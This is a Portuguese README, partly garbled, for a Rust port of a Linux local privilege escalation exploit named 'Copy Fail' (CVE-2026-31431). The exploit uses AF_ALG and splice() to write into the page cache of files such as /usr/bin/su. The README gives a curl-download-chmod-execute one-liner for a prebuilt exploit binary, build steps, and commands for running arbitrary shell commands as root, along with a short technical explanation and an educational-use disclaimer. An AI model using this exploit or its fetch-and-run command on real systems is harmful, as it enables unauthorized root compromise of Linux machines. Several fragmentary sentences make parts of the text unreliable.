
Explorar exploit de falha de cópia (CVE-2026-31431), mas em Rust.
Exploit Copy Fail (CVE-2026-31431) mas em Rust, uma vulnerabilidade crítica que encadeia AF_ALG e splice() para realizar uma escrita de 4 bytes no cache de páginas, levando à escalada local de privilégios nas principais distribuições Linux.
Baseado na pesquisa e PoC de Xint Code.
[!CAUTION] Este projeto é apenas para fins educacionais e de pesquisa. Executar este exploit em sistemas que você não possui ou sem permissão explícita para testar é ilegal e antiético. Use este código com responsabilidade para entender e se defender contra vulnerabilidades semelhantes.
AF_ALG e splice() do kernel Linux via libc.Você pode baixar e executar o binário PoC pré-compilado diretamente:
curl -L https://github.com/sammwyy/copyfail-rs/releases/download/poc/copyfail-rs_x86-64 -o copyfail-rs && chmod +x copyfail-rs && ./copyfail-rs
/usr/bin/su).Clone o repositório e compile o binário:
git clone https://github.com/sammwyy/copyfail-rs.git
cd copyfail-rs
cargo build --release
Execute o exploit sem argumentos para usar /bin/sh como padrão:
./target/release/copyfail-rs
Ou especifique um comando personalizado para executar como root:
./target/release/copyfail-rs "whoami > /tmp/pwned"
O exploit aproveita uma falha na implementação de authencesn na API de Criptografia do kernel Linux (AF_ALG). Ao encadear sendmsg com MSG_MORE e splice(), é possível sobrescrever pequenos blocos do cache de páginas de arquivos arbitrários (como /usr/bin/su) com um payload ELF malicioso.
AF_ALG e o vincula a authencesn(hmac(sha256),cbc(aes)).AF_ALG.